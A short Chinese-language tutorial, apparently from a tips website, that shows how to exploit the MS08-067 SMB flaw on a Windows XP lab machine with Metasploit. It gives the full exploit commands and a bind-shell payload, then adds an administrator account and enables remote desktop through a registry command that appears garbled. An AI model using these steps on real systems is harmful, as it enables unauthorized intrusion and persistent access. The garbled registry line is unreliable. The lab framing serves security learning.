kalilinux攻擊漏洞MS08 067
- 電腦
- 關注:1.94W次
在這裏小編為大家介紹一下基於linux平台的ms08_067漏洞的利用。我用VMware搭建了一個實驗環境, kalilinux: winxp 要做的就是用Kali Linux裏的Metasploit入侵WinXP
操作方法
(01)在Kali用命令 msfconsole 開啟Metasploit (在終端裏輸入msfconsole)
(02)然後運行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程序
(03)set LHOST #設置本地主機IP
(04)set RHOST #設置目標主機IP
(05)set payload windows/shell_bind_tcp #設置payload
(06)show options #查看設置信息
(07)exploit #實施攻擊
(08)攻擊成功,我們得到了一個cmdshell,接下來就是新建賬户了。
(09)添加用户名為zeal,密碼為zeal的用户,並把zeal用户添加到管理組。接下來執行命令 netstat -an 看一下目標主機開放端口的情況
(10)發現並沒有開啟3389(遠程桌面連接端口),我們需要手動開啟。需要執行命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
(11)有了目標主機的cmdshell你想做什麼不行吧?
(12)好了演示到此完畢!
特別提示
不要隨便攻擊別人,漏洞基本都修復了。
命令注意大小寫
目標的winxp最好是英文的
- 文章版權屬於文章作者所有,轉載請註明 https://miaozhigu.com/sm/diannao/xvm3r8.html